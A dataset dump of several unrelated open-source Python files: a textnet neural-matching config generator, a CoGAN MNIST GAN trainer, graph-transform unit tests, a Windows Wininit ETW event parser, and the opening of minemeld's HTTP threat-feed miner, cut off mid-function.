max_stars_repo_path | max_stars_repo_name | max_stars_count | id | content
---|---|---|---|---|
script/aaai_match_arci_qa_rank.py | pl8787/textnet-release | 114 | 12687287 | #-*-coding:utf8-*-
import copy, os
from gen_conf_file import *
from dataset_cfg import *
def gen_match_lstm(d_mem, init, lr, dataset, l2, lstm_norm2):
# print "ORC: left & right lstm share parameters"
net = {}
ds = DatasetCfg(dataset)
g_filler = gen_uniform_filler_setting(init)
zero_filler = gen_zero_filler_setting()
g_updater = gen_adagrad_setting(lr = lr, l2 = l2, batch_size = ds.train_batch_size)
zero_l2_updater = gen_adagrad_setting(lr = lr, batch_size = ds.train_batch_size)
g_layer_setting = {}
g_layer_setting['no_bias'] = False
g_layer_setting['w_filler'] = g_filler
g_layer_setting['b_filler'] = zero_filler
g_layer_setting['w_updater'] = g_updater
g_layer_setting['b_updater'] = g_updater
net['net_name'] = 'match_arci'
net['need_reshape'] = True
net_cfg_train, net_cfg_valid, net_cfg_test = {}, {}, {}
net['net_config'] = [net_cfg_train, net_cfg_valid, net_cfg_test]
net_cfg_train["tag"] = "Train"
net_cfg_train["max_iters"] = ds.train_max_iters
net_cfg_train["display_interval"] = ds.train_display_interval
net_cfg_train["out_nodes"] = ['loss']
net_cfg_valid["tag"] = "Valid"
net_cfg_valid["max_iters"] = ds.valid_max_iters
net_cfg_valid["display_interval"] = ds.valid_display_interval
net_cfg_valid["out_nodes"] = ['P@k','MRR']
net_cfg_test["tag"] = "Test"
net_cfg_test["max_iters"] = ds.test_max_iters
net_cfg_test["display_interval"] = ds.test_display_interval
net_cfg_test["out_nodes"] = ['P@k', 'MRR']
layers = []
net['layers'] = layers
layer = {}
layers.append(layer)
layer['bottom_nodes'] = []
layer['top_nodes'] = ['x', 'y']
layer['layer_name'] = 'train_data'
layer['layer_type'] = 79
layer['tag'] = ['Train']
setting = {}
layer['setting'] = setting
setting['batch_size'] = ds.train_batch_size
setting['shuffle'] = True
setting['data_file'] = ds.train_data_file
setting['max_doc_len'] = ds.max_doc_len
setting['min_doc_len'] = ds.min_doc_len
layer = {}
layers.append(layer)
layer['bottom_nodes'] = []
layer['top_nodes'] = ['x', 'y']
layer['layer_name'] = 'valid_data'
layer['layer_type'] = 80
layer['tag'] = ['Valid']
setting = {}
layer['setting'] = setting
setting['data_file'] = ds.valid_data_file
setting['max_doc_len'] = ds.max_doc_len
setting['min_doc_len'] = ds.min_doc_len
layer = {}
layers.append(layer)
layer['bottom_nodes'] = []
layer['top_nodes'] = ['x', 'y']
layer['layer_name'] = 'test_data'
layer['layer_type'] = 80
layer['tag'] = ['Test']
setting = {}
layer['setting'] = setting
setting['data_file'] = ds.test_data_file
setting['max_doc_len'] = ds.max_doc_len
setting['min_doc_len'] = ds.min_doc_len
layer = {}
layers.append(layer)
layer['bottom_nodes'] = ['x']
layer['top_nodes'] = ['word_rep_seq']
layer['layer_name'] = 'embedding'
layer['layer_type'] = 21
setting = copy.deepcopy(g_layer_setting)
layer['setting'] = setting
setting['embedding_file'] = ds.embedding_file
print "ORC: update all words"
# setting['update_indication_file'] = ds.update_indication_file
setting['feat_size'] = ds.d_word_rep
setting['word_count'] = ds.vocab_size
print "ORC: not use l2 for embedding"
setting['w_updater'] = zero_l2_updater
layer = {}
layers.append(layer)
layer['bottom_nodes'] = ['word_rep_seq']
layer['top_nodes'] = ['l_sentence', 'r_sentence']
layer['layer_name'] = 'sentence_split'
layer['layer_type'] = 20
setting = {}
layer['setting'] = setting
layer = {}
layers.append(layer)
layer['bottom_nodes'] = ['l_sentence']
layer['top_nodes'] = ['l_sentence_conv_1']
layer['layer_name'] = 'l_conv_1'
layer['layer_type'] = 14
setting = copy.deepcopy(g_layer_setting)
layer['setting'] = setting
setting['channel_out'] = d_mem
setting['kernel_x'] = ds.d_word_rep
setting['kernel_y'] = 3
setting['pad_x'] = 0
setting['pad_y'] = 2
setting['no_bias'] = True
setting['stride'] = 1
setting['d1_var_len'] = True
layer = {}
layers.append(layer)
layer['bottom_nodes'] = ['l_sentence_conv_1']
layer['top_nodes'] = ['l_sentence_conv_nonlinear_1']
layer['layer_name'] = 'l_conv_nonlinear_1'
layer['layer_type'] = 3
setting = {}
layer['setting'] = setting
layer = {}
layers.append(layer)
layer['bottom_nodes'] = ['l_sentence_conv_nonlinear_1']
layer['top_nodes'] = ['l_sentence_swap_1']
layer['layer_name'] = 'l_swap_1'
layer['layer_type'] = 42
setting = {'pass_len':True, 'pass_len_dim':1, 'axis1':1, 'axis2':3}
layer['setting'] = setting
layer = {}
layers.append(layer)
layer['bottom_nodes'] = ['l_sentence_swap_1', 'l_sentence']
layer['top_nodes'] = ['l_sentence_pool_1']
layer['layer_name'] = 'l_pool_1'
layer['layer_type'] = 10001
setting = {}
layer['setting'] = setting
setting['L'] = 2
setting['l'] = 1
setting['max_sentence_length'] = ds.max_doc_len
setting['min_rep_length'] = 4
layer = {}
layers.append(layer)
layer['bottom_nodes'] = ['l_sentence_pool_1']
layer['top_nodes'] = ['l_sentence_conv_2']
layer['layer_name'] = 'l_conv_2'
layer['layer_type'] = 14
setting = copy.deepcopy(g_layer_setting)
layer['setting'] = setting
setting['channel_out'] = d_mem
setting['kernel_x'] = d_mem
setting['kernel_y'] = 3
setting['pad_x'] = 0
setting['pad_y'] = 2
setting['no_bias'] = True
setting['stride'] = 1
setting['d1_var_len'] = True
layer = {}
layers.append(layer)
layer['bottom_nodes'] = ['l_sentence_conv_2']
layer['top_nodes'] = ['l_sentence_conv_nonlinear_2']
layer['layer_name'] = 'l_conv_nonlinear_2'
layer['layer_type'] = 3
setting = {}
layer['setting'] = setting
layer = {}
layers.append(layer)
layer['bottom_nodes'] = ['l_sentence_conv_nonlinear_2']
layer['top_nodes'] = ['l_sentence_swap_2']
layer['layer_name'] = 'l_swap_2'
layer['layer_type'] = 42
setting = {'pass_len':True, 'pass_len_dim':1, 'axis1':1, 'axis2':3}
layer['setting'] = setting
layer = {}
layers.append(layer)
layer['bottom_nodes'] = ['l_sentence_swap_2', 'l_sentence']
layer['top_nodes'] = ['l_sentence_pool_2']
layer['layer_name'] = 'l_pool_2'
layer['layer_type'] = 10001
setting = {}
layer['setting'] = setting
setting['L'] = 2
setting['l'] = 2
setting['max_sentence_length'] = ds.max_doc_len
setting['min_rep_length'] = 4
# layer = {}
# layers.append(layer)
# layer['bottom_nodes'] = ['l_sentence_pool_2']
# layer['top_nodes'] = ['l_sentence_conv_3']
# layer['layer_name'] = 'l_conv_3'
# layer['layer_type'] = 14
# setting = copy.deepcopy(g_layer_setting)
# layer['setting'] = setting
# setting['channel_out'] = d_mem
# setting['kernel_x'] = d_mem
# setting['kernel_y'] = 3
# setting['pad_x'] = 0
# setting['pad_y'] = 2
# setting['no_bias'] = True
# setting['stride'] = 1
# setting['d1_var_len'] = True
# layer = {}
# layers.append(layer)
# layer['bottom_nodes'] = ['l_sentence_conv_3']
# layer['top_nodes'] = ['l_sentence_conv_nonlinear_3']
# layer['layer_name'] = 'l_conv_nonlinear_3'
# layer['layer_type'] = 3
# setting = {}
# layer['setting'] = setting
# layer = {}
# layers.append(layer)
# layer['bottom_nodes'] = ['l_sentence_conv_nonlinear_3']
# layer['top_nodes'] = ['l_sentence_swap_3']
# layer['layer_name'] = 'l_swap_3'
# layer['layer_type'] = 42
# setting = {'pass_len':True, 'pass_len_dim':1, 'axis1':1, 'axis2':3}
# layer['setting'] = setting
# layer = {}
# layers.append(layer)
# layer['bottom_nodes'] = ['l_sentence_swap_3', 'l_sentence']
# layer['top_nodes'] = ['l_sentence_pool_3']
# layer['layer_name'] = 'l_pool_3'
# layer['layer_type'] = 10001
# setting = {}
# layer['setting'] = setting
# setting['L'] = 3
# setting['l'] = 3
# setting['max_sentence_length'] = ds.max_doc_len
# setting['min_rep_length'] = 4
layer = {}
layers.append(layer)
layer['bottom_nodes'] = ['r_sentence']
layer['top_nodes'] = ['r_sentence_conv_1']
layer['layer_name'] = 'r_conv_1'
layer['layer_type'] = 14
setting = copy.deepcopy(g_layer_setting)
layer['setting'] = setting
setting['channel_out'] = d_mem
setting['kernel_x'] = ds.d_word_rep
setting['kernel_y'] = 3
setting['pad_x'] = 0
setting['pad_y'] = 2
setting['no_bias'] = True
setting['stride'] = 1
setting['d1_var_len'] = True
layer = {}
layers.append(layer)
layer['bottom_nodes'] = ['r_sentence_conv_1']
layer['top_nodes'] = ['r_sentence_conv_nonlinear_1']
layer['layer_name'] = 'r_conv_nonlinear_1'
layer['layer_type'] = 3
setting = {}
layer['setting'] = setting
layer = {}
layers.append(layer)
layer['bottom_nodes'] = ['r_sentence_conv_nonlinear_1']
layer['top_nodes'] = ['r_sentence_swap_1']
layer['layer_name'] = 'r_swap_1'
layer['layer_type'] = 42
setting = {'pass_len':True, 'pass_len_dim':1, 'axis1':1, 'axis2':3}
layer['setting'] = setting
layer = {}
layers.append(layer)
layer['bottom_nodes'] = ['r_sentence_swap_1', 'r_sentence']
layer['top_nodes'] = ['r_sentence_pool_1']
layer['layer_name'] = 'r_pool_1'
layer['layer_type'] = 10001
setting = {}
layer['setting'] = setting
setting['L'] = 2
setting['l'] = 1
setting['max_sentence_length'] = ds.max_doc_len
setting['min_rep_length'] = 4
layer = {}
layers.append(layer)
layer['bottom_nodes'] = ['r_sentence_pool_1']
layer['top_nodes'] = ['r_sentence_conv_2']
layer['layer_name'] = 'r_conv_2'
layer['layer_type'] = 14
setting = copy.deepcopy(g_layer_setting)
layer['setting'] = setting
setting['channel_out'] = d_mem
setting['kernel_x'] = d_mem
setting['kernel_y'] = 3
setting['pad_x'] = 0
setting['pad_y'] = 2
setting['no_bias'] = True
setting['stride'] = 1
setting['d1_var_len'] = True
layer = {}
layers.append(layer)
layer['bottom_nodes'] = ['r_sentence_conv_2']
layer['top_nodes'] = ['r_sentence_conv_nonlinear_2']
layer['layer_name'] = 'r_conv_nonlinear_2'
layer['layer_type'] = 3
setting = {}
layer['setting'] = setting
layer = {}
layers.append(layer)
layer['bottom_nodes'] = ['r_sentence_conv_nonlinear_2']
layer['top_nodes'] = ['r_sentence_swap_2']
layer['layer_name'] = 'r_swap_2'
layer['layer_type'] = 42
setting = {'pass_len':True, 'pass_len_dim':1, 'axis1':1, 'axis2':3}
layer['setting'] = setting
layer = {}
layers.append(layer)
layer['bottom_nodes'] = ['r_sentence_swap_2', 'r_sentence']
layer['top_nodes'] = ['r_sentence_pool_2']
layer['layer_name'] = 'r_pool_2'
layer['layer_type'] = 10001
setting = {}
layer['setting'] = setting
setting['L'] = 2
setting['l'] = 2
setting['max_sentence_length'] = ds.max_doc_len
setting['min_rep_length'] = 4
# layer = {}
# layers.append(layer)
# layer['bottom_nodes'] = ['r_sentence_pool_2']
# layer['top_nodes'] = ['r_sentence_conv_3']
# layer['layer_name'] = 'r_conv_3'
# layer['layer_type'] = 14
# setting = copy.deepcopy(g_layer_setting)
# layer['setting'] = setting
# setting['channel_out'] = d_mem
# setting['kernel_x'] = d_mem
# setting['kernel_y'] = 3
# setting['pad_x'] = 0
# setting['pad_y'] = 2
# setting['no_bias'] = True
# setting['stride'] = 1
# setting['d1_var_len'] = True
# layer = {}
# layers.append(layer)
# layer['bottom_nodes'] = ['r_sentence_conv_3']
# layer['top_nodes'] = ['r_sentence_conv_nonlinear_3']
# layer['layer_name'] = 'r_conv_nonlinear_3'
# layer['layer_type'] = 3
# setting = {}
# layer['setting'] = setting
# layer = {}
# layers.append(layer)
# layer['bottom_nodes'] = ['r_sentence_conv_nonlinear_3']
# layer['top_nodes'] = ['r_sentence_swap_3']
# layer['layer_name'] = 'r_swap_3'
# layer['layer_type'] = 42
# setting = {'pass_len':True, 'pass_len_dim':1, 'axis1':1, 'axis2':3}
# layer['setting'] = setting
# layer = {}
# layers.append(layer)
# layer['bottom_nodes'] = ['r_sentence_swap_3', 'r_sentence']
# layer['top_nodes'] = ['r_sentence_pool_3']
# layer['layer_name'] = 'r_pool_3'
# layer['layer_type'] = 10001
# setting = {}
# layer['setting'] = setting
# setting['L'] = 3
# setting['l'] = 3
# setting['max_sentence_length'] = ds.max_doc_len
# setting['min_rep_length'] = 4
layer = {}
layers.append(layer)
layer['bottom_nodes'] = ['l_sentence_pool_2', 'r_sentence_pool_2']
layer['top_nodes'] = ['bi_sentence_rep']
layer['layer_name'] = 'concat'
layer['layer_type'] = 18
setting = {}
layer['setting'] = setting
setting['bottom_node_num'] = 2
setting['concat_dim_index'] = 3
setting['is_concat_by_length'] = False
layer = {}
layers.append(layer)
layer['bottom_nodes'] = ['bi_sentence_rep']
layer['top_nodes'] = ['hidden_trans']
layer['layer_name'] = 'mlp_hidden'
layer['layer_type'] = 11
setting = copy.deepcopy(g_layer_setting)
layer['setting'] = setting
setting['num_hidden'] = d_mem * 4
layer = {}
layers.append(layer)
layer['bottom_nodes'] = ['hidden_trans']
layer['top_nodes'] = ['hidden_rep']
layer['layer_name'] = 'hidden_nonlinear'
layer['layer_type'] = 1
setting = {}
layer['setting'] = setting
# layer = {}
# layers.append(layer)
# layer['bottom_nodes'] = ['hidden_rep']
# layer['top_nodes'] = ['hidden_drop_rep']
# layer['layer_name'] = 'dropout'
# layer['layer_type'] = 13
# ds.dp_rate = 0.
# print "ORC, dp rate:", ds.dp_rate
# setting = {'rate':ds.dp_rate}
# layer['setting'] = setting
layer = {}
layers.append(layer)
layer['bottom_nodes'] = ['hidden_rep']
# layer['bottom_nodes'] = ['dpool_rep']
layer['top_nodes'] = ['softmax_prob']
layer['layer_name'] = 'softmax_fullconnect'
layer['layer_type'] = 11
setting = copy.deepcopy(g_layer_setting)
layer['setting'] = setting
setting['num_hidden'] = 1 # ds.num_class
# setting['no_bias'] = True
setting['w_filler'] = zero_filler
layer = {}
layers.append(layer)
layer['bottom_nodes'] = ['softmax_prob', 'y']
layer['top_nodes'] = ['loss']
# layer['layer_name'] = 'softmax_activation'
layer['layer_name'] = 'pair_hinge'
layer['layer_type'] = 55
layer['tag'] = ['Train']
setting = {}
layer['setting'] = setting
setting['delta'] = 1.
layer = {}
layers.append(layer)
layer['bottom_nodes'] = ['softmax_prob', 'y']
layer['top_nodes'] = ['P@k']
layer['layer_name'] = 'P@k_layer'
layer['layer_type'] = 61
layer['tag'] = ['Valid', 'Test']
setting = {'k':1, 'col':0, 'method':'P@k'}
layer['setting'] = setting
layer = {}
layers.append(layer)
layer['bottom_nodes'] = ['softmax_prob', 'y']
layer['top_nodes'] = ['MRR']
layer['layer_name'] = 'MRR_layer'
layer['layer_type'] = 61
layer['tag'] = ['Valid', 'Test']
setting = {'k':1, 'col':0, 'method':'MRR'}
layer['setting'] = setting
return net
run = 1
l2 = 0.
# for dataset in ['paper']:
for dataset in ['qa_top1k_4']:
for d_mem in [50]:
idx = 0
# for epoch_no in [0, 10000, 25000]:
for epoch_no in [0]:
for init in [0.3, 0.1, 0.03]:
for lr in [0.5, 0.3, 0.1, 0.03]:
# for l2 in [0.00001, 0.0001, 0.001]:
init_t = init
# t_lr = t_lr_mul * lr
pretrain_run_no = 0
lstm_norm2 = 100000
net = gen_match_lstm(d_mem=d_mem,init=init,lr=lr,dataset=dataset,l2=l2,lstm_norm2=lstm_norm2)
net['log'] = 'log.match.arci.{0}.d{1}.run{2}.{3}'.format\
(dataset, str(d_mem), str(run), str(idx))
# net["save_model"] = {"file_prefix": "./model/model."+str(idx),"save_interval": 500}
# net["save_activation"] = [{"tag":"Valid","file_prefix": \
# "./model/valid."+str(idx), \
# "save_interval": 500, \
# "save_nodes":["x","y","word_rep_seq","l_sentence",\
# "r_sentence","interaction_rep", \
# # "interaction_rep_nonlinear",\
# "dpool_rep","softmax_prob"], \
# "save_iter_num":1}]
gen_conf_file(net, '/home/wsx/exp/match/{0}/arci/run.{1}/'.format(dataset,str(run)) + \
'model.match.arci.{0}.d{1}.run{2}.{3}'.format\
(dataset, str(d_mem), str(run), str(idx)))
idx += 1
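# Hypothetical inspection sketch (not part of the original script): the commented call
# below would build a single config dict in isolation so its structure can be checked
# without writing anything under /home/wsx/exp. The parameter values are illustrative.
# net = gen_match_lstm(d_mem=50, init=0.1, lr=0.1, dataset='qa_top1k_4', l2=0., lstm_norm2=100000)
# print net['net_name'], len(net['layers'])  # 'match_arci' and the number of configured layers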
|
cogan_pytorch/src/trainer_gan_mnist.py | sagardsaxena/CoGAN | 285 | 12687299 | from torch.autograd import Variable
from net_gan_mnist import *
import torch
import torch.nn as nn
import numpy as np
from init import *
class MNISTGanTrainer(object):
def __init__(self, batch_size=64, latent_dims=100):
super(MNISTGanTrainer, self).__init__()
self.dis = Dis28x28()
self.gen = Gen28x28(latent_dims)
self.dis_opt = torch.optim.Adam(self.dis.parameters(), lr=0.0002, betas=(0.5, 0.999), weight_decay=0.0005)
self.gen_opt = torch.optim.Adam(self.gen.parameters(), lr=0.0002, betas=(0.5, 0.999), weight_decay=0.0005)
self.true_labels = Variable(torch.LongTensor(np.ones(batch_size, dtype=np.int)))
self.fake_labels = Variable(torch.LongTensor(np.zeros(batch_size, dtype=np.int)))
self.dis.apply(xavier_weights_init)
self.gen.apply(xavier_weights_init)
def cuda(self):
self.dis.cuda()
self.gen.cuda()
self.true_labels = self.true_labels.cuda()
self.fake_labels = self.fake_labels.cuda()
def dis_update(self, images, noise):
self.dis.zero_grad()
true_outputs = self.dis(images)
true_loss = nn.functional.cross_entropy(true_outputs, self.true_labels)
_, true_predicts = torch.max(true_outputs.data, 1)
true_acc = (true_predicts == 1).sum()/(1.0*true_predicts.size(0))
fake_images = self.gen(noise)
fake_outputs = self.dis(fake_images)
fake_loss = nn.functional.cross_entropy(fake_outputs, self.fake_labels)
_, fake_predicts = torch.max(fake_outputs.data, 1)
fake_acc = (fake_predicts == 0).sum() / (1.0 * fake_predicts.size(0))
d_loss = true_loss + fake_loss
d_loss.backward()
self.dis_opt.step()
return 0.5 * (true_acc + fake_acc)
def gen_update(self, noise):
self.gen.zero_grad()
fake_images = self.gen(noise)
fake_outputs = self.dis(fake_images)
fake_loss = nn.functional.cross_entropy(fake_outputs, self.true_labels)
fake_loss.backward()
self.gen_opt.step()
return fake_images
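# Hypothetical usage sketch (not part of the original file): drive the trainer above with a
# standard torchvision MNIST loader. The data path, epoch-less single pass, and batch handling
# are illustrative assumptions, not values taken from the CoGAN project.
if __name__ == '__main__':
    import torchvision
    import torchvision.transforms as transforms
    from torch.utils.data import DataLoader
    mnist = torchvision.datasets.MNIST('./data', train=True, download=True,
                                       transform=transforms.ToTensor())
    loader = DataLoader(mnist, batch_size=64, shuffle=True, drop_last=True)
    trainer = MNISTGanTrainer(batch_size=64, latent_dims=100)
    trainer.cuda()
    for images, _ in loader:
        noise = Variable(torch.randn(64, 100)).cuda()
        dis_acc = trainer.dis_update(images.cuda(), noise)  # discriminator step
        fake_images = trainer.gen_update(noise)             # generator step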
|
galileo/tests/test_transforms.py | YaoPu2021/galileo | 115 | 12687315 | # Copyright 2020 JD.com, Inc. Galileo Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import os
import pytest
import torch
import galileo.pytorch as gp
import tensorflow as tf
import galileo.tf as gt
from galileo.tests.utils import numpy_equal
os.environ['CUDA_VISIBLE_DEVICES'] = '-1'
# batch size=5 num nodes=10
# indices [5, 9]
fanouts = [2, 3]
indices = [
[2, 7, 4, 4, 2, 1, 3, 8, 1],
[8, 9, 2, 3, 6, 4, 4, 4, 0],
[4, 7, 1, 0, 1, 3, 0, 4, 1],
[4, 2, 6, 1, 5, 1, 4, 0, 5],
[3, 2, 2, 9, 8, 8, 0, 1, 7],
]
expect_no_sort = [
[
2, 8, 4, 4, 3, 2, 8, 4, 4, 3, 7, 9, 7, 2, 2, 7, 9, 7, 2, 2, 7, 9, 7, 2,
2, 4, 2, 1, 6, 2, 4, 2, 1, 6, 2, 4, 2, 1, 6, 2
],
[
7, 9, 7, 2, 2, 4, 2, 1, 6, 2, 4, 3, 0, 1, 9, 2, 6, 1, 5, 8, 1, 4, 3, 1,
8, 3, 4, 0, 4, 0, 8, 4, 4, 0, 1, 1, 0, 1, 5, 7
],
]
expect_sort = [
[
1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 3, 3, 4, 4, 4, 4, 4,
4, 4, 6, 6, 6, 7, 7, 7, 7, 7, 7, 8, 8, 9, 9, 9
],
[
0, 4, 1, 7, 4, 1, 9, 5, 8, 1, 8, 4, 0, 4, 1, 0, 7, 2, 2, 7, 2, 1, 6, 3,
8, 1, 4, 0, 5, 4, 0, 2, 1, 1, 3, 9, 2, 3, 6, 4
],
]
expect_target = [2, 8, 4, 4, 3]
@pytest.mark.parametrize('sort_indices', (False, True))
def test_relation_transform_tf(sort_indices):
rt = gt.RelationTransform(fanouts,
sort_indices=sort_indices,
sort_stable=True)
res = rt.transform(
dict(indices=tf.convert_to_tensor(indices),
edge_weight=tf.random.normal((5, 9))))
assert list(res.keys()) == [
'relation_indices',
'relation_weight',
'target_indices',
]
assert res['relation_indices'].shape == [2, 40]
expect = expect_sort if sort_indices else expect_no_sort
assert numpy_equal(res['relation_indices'].numpy(), expect)
assert res['relation_weight'].shape == [40, 1]
assert res['target_indices'].shape == [5]
assert numpy_equal(res['target_indices'].numpy(), expect_target)
@pytest.mark.parametrize('sort_indices', (False, True))
def test_relation_transform_pytorch(sort_indices):
rt = gp.RelationTransform(fanouts,
sort_indices=sort_indices,
sort_stable=True)
res = rt.transform(
dict(indices=torch.tensor(indices), edge_weight=torch.randn(5, 9)))
assert list(res.keys()) == [
'relation_indices',
'relation_weight',
'target_indices',
]
assert numpy_equal(res['relation_indices'].shape, [2, 40])
if sort_indices:
# sort is not stable in pytorch
assert numpy_equal(res['relation_indices'][0].numpy(), expect_sort[0])
else:
assert numpy_equal(res['relation_indices'].numpy(), expect_no_sort)
assert numpy_equal(res['relation_weight'].shape, [40, 1])
assert numpy_equal(res['target_indices'].shape, [5])
assert numpy_equal(res['target_indices'].numpy(), expect_target)
|
etl/parsers/etw/Microsoft_Windows_Wininit.py | IMULMUL/etl-parser | 104 | 12687331 | # -*- coding: utf-8 -*-
"""
Microsoft-Windows-Wininit
GUID : 206f6dea-d3c5-4d10-bc72-989f03c8b84b
"""
from construct import Int8sl, Int8ul, Int16ul, Int16sl, Int32sl, Int32ul, Int64sl, Int64ul, Bytes, Double, Float32l, Struct
from etl.utils import WString, CString, SystemTime, Guid
from etl.dtyp import Sid
from etl.parsers.etw.core import Etw, declare, guid
@declare(guid=guid("206f6dea-d3c5-4d10-bc72-989f03c8b84b"), event_id=9, version=0)
class Microsoft_Windows_Wininit_9_0(Etw):
pattern = Struct(
"Flags" / Int32ul
)
@declare(guid=guid("206f6dea-d3c5-4d10-bc72-989f03c8b84b"), event_id=10, version=0)
class Microsoft_Windows_Wininit_10_0(Etw):
pattern = Struct(
"Win32Status" / Int32ul
)
@declare(guid=guid("206f6dea-d3c5-4d10-bc72-989f03c8b84b"), event_id=11, version=0)
class Microsoft_Windows_Wininit_11_0(Etw):
pattern = Struct(
"StringCount" / Int32ul,
"String" / WString
)
@declare(guid=guid("206f6dea-d3c5-4d10-bc72-989f03c8b84b"), event_id=12, version=0)
class Microsoft_Windows_Wininit_12_0(Etw):
pattern = Struct(
"Level" / Int32ul
)
@declare(guid=guid("206f6dea-d3c5-4d10-bc72-989f03c8b84b"), event_id=14, version=0)
class Microsoft_Windows_Wininit_14_0(Etw):
pattern = Struct(
"Config" / Int32ul,
"IsTestConfig" / Int32ul
)
@declare(guid=guid("206f6dea-d3c5-4d10-bc72-989f03c8b84b"), event_id=16, version=0)
class Microsoft_Windows_Wininit_16_0(Etw):
pattern = Struct(
"Level" / Int32ul
)
@declare(guid=guid("206f6dea-d3c5-4d10-bc72-989f03c8b84b"), event_id=17, version=0)
class Microsoft_Windows_Wininit_17_0(Etw):
pattern = Struct(
"Level" / Int32ul
)
@declare(guid=guid("206f6dea-d3c5-4d10-bc72-989f03c8b84b"), event_id=53, version=0)
class Microsoft_Windows_Wininit_53_0(Etw):
pattern = Struct(
"SessionId" / Int32ul,
"Flags" / Int32ul
)
@declare(guid=guid("206f6dea-d3c5-4d10-bc72-989f03c8b84b"), event_id=55, version=0)
class Microsoft_Windows_Wininit_55_0(Etw):
pattern = Struct(
"SessionId" / Int32ul,
"IsRemote" / Int32ul,
"GracePeriod" / Int32ul,
"Flags" / Int32ul,
"Reason" / Int32ul,
"Message" / WString
)
@declare(guid=guid("206f6dea-d3c5-4d10-bc72-989f03c8b84b"), event_id=6001, version=0)
class Microsoft_Windows_Wininit_6001_0(Etw):
pattern = Struct(
"Flags" / Int32ul
)
@declare(guid=guid("206f6dea-d3c5-4d10-bc72-989f03c8b84b"), event_id=6002, version=1)
class Microsoft_Windows_Wininit_6002_1(Etw):
pattern = Struct(
"ShutdownFlags" / Int32ul,
"SystemShutdownDuration" / Int64ul,
"SkuHasLogoff" / Int32ul
)
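# Hypothetical usage sketch (not part of the original module): the generated event classes
# expose construct `Struct` patterns that can be exercised directly on raw payload bytes.
# The 4-byte payload below is made up for illustration.
if __name__ == '__main__':
    parsed = Microsoft_Windows_Wininit_9_0.pattern.parse(b'\x03\x00\x00\x00')
    print(parsed.Flags)  # -> 3 (Int32ul is parsed little-endian)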
|
minemeld/ft/http.py | zul126/minemeld-core | 147 | 12687338 | # Copyright 2015 Palo Alto Networks, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This module implements minemeld.ft.http.HttpFT, the Miner node for plain
text feeds over HTTP/HTTPS.
"""
import requests
import logging
import re
import itertools
from minemeld import __version__ as MM_VERSION
from . import basepoller
LOG = logging.getLogger(__name__)
class HttpFT(basepoller.BasePollerFT):
"""Implements class for miners of plain text feeds over http/https.
**Config parameters**
:url: URL of the feed.
:polling_timeout: timeout of the polling request in seconds.
Default: 20
:verify_cert: boolean, if *true* feed HTTPS server certificate is
verified. Default: *true*
:user_agent: string, value for the User-Agent header in HTTP
request. If ``MineMeld``, MineMeld/<version> is used.
Default: python ``requests`` default.
:ignore_regex: Python regular expression for lines that should be
ignored. Default: *null*
:indicator: an *extraction dictionary* to extract the indicator from
the line. If *null*, the text until the first whitespace or newline
character is used as indicator. Default: *null*
:fields: a dictionary of *extraction dictionaries* to extract
additional attributes from each line. Default: {}
:encoding: encoding of the feed, if not UTF-8. See
``str.decode`` for options. Default: *null*, meaning do
nothing (assumes UTF-8).
**Extraction dictionary**
Extraction dictionaries contain the following keys:
:regex: Python regular expression for searching the text.
:transform: template to generate the final value from the result
of the regular expression. Default: the entire match of the regex
is used as extracted value.
See Python `re <https://docs.python.org/2/library/re.html>`_ module for
details about Python regular expressions and templates.
Example:
Example config in YAML where extraction dictionaries are used to
extract the indicator and additional fields::
url: https://www.dshield.org/block.txt
ignore_regex: "[#S].*"
indicator:
regex: '^([0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3})\\t([0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3})'
transform: '\\1-\\2'
fields:
dshield_nattacks:
regex: '^.*\\t.*\\t[0-9]+\\t([0-9]+)'
transform: '\\1'
dshield_name:
regex: '^.*\\t.*\\t[0-9]+\\t[0-9]+\\t([^\\t]+)'
transform: '\\1'
dshield_country:
regex: '^.*\\t.*\\t[0-9]+\\t[0-9]+\\t[^\\t]+\\t([A-Z]+)'
transform: '\\1'
dshield_email:
regex: '^.*\\t.*\\t[0-9]+\\t[0-9]+\\t[^\\t]+\\t[A-Z]+\\t(\\S+)'
transform: '\\1'
Example config in YAML where the text in each line until the first
whitespace is used as indicator::
url: https://ransomwaretracker.abuse.ch/downloads/CW_C2_URLBL.txt
ignore_regex: '^#'
Args:
name (str): node name, should be unique inside the graph
chassis (object): parent chassis instance
config (dict): node config.
"""
def configure(self):
super(HttpFT, self).configure()
self.url = self.config.get('url', None)
self.polling_timeout = self.config.get('polling_timeout', 20)
self.verify_cert = self.config.get('verify_cert', True)
self.user_agent = self.config.get('user_agent', None)
self.encoding = self.config.get('encoding', None)
self.username = self.config.get('username', None)
self.password = self.config.get('password', None)
self.ignore_regex = self.config.get('ignore_regex', None)
if self.ignore_regex is not None:
self.ignore_regex = re.compile(self.ignore_regex)
self.indicator = self.config.get('indicator', None)
if self.indicator is not None:
if 'regex' in self.indicator:
self.indicator['regex'] = re.compile(self.indicator['regex'])
else:
raise ValueError('%s - indicator stanza should have a regex' % self.name)
if 'transform' not in self.indicator:
if self.indicator['regex'].groups > 0:
LOG.warning('%s - no transform string for indicator'
' but pattern contains groups',
self.name)
self.indicator['transform'] = '\g<0>'
self.fields = self.config.get('fields', {})
for f, fattrs in self.fields.iteritems():
if 'regex' in fattrs:
fattrs['regex'] = re.compile(fattrs['regex'])
else:
raise ValueError('%s - %s field does not have a regex' % (self.name, f))
if 'transform' not in fattrs:
if fattrs['regex'].groups > 0:
LOG.warning('%s - no transform string for field %s'
' but pattern contains groups',
self.name, f)
fattrs['transform'] = '\g<0>'
def _process_item(self, line):
line = line.strip()
if not line:
return [[None, None]]
if self.indicator is None:
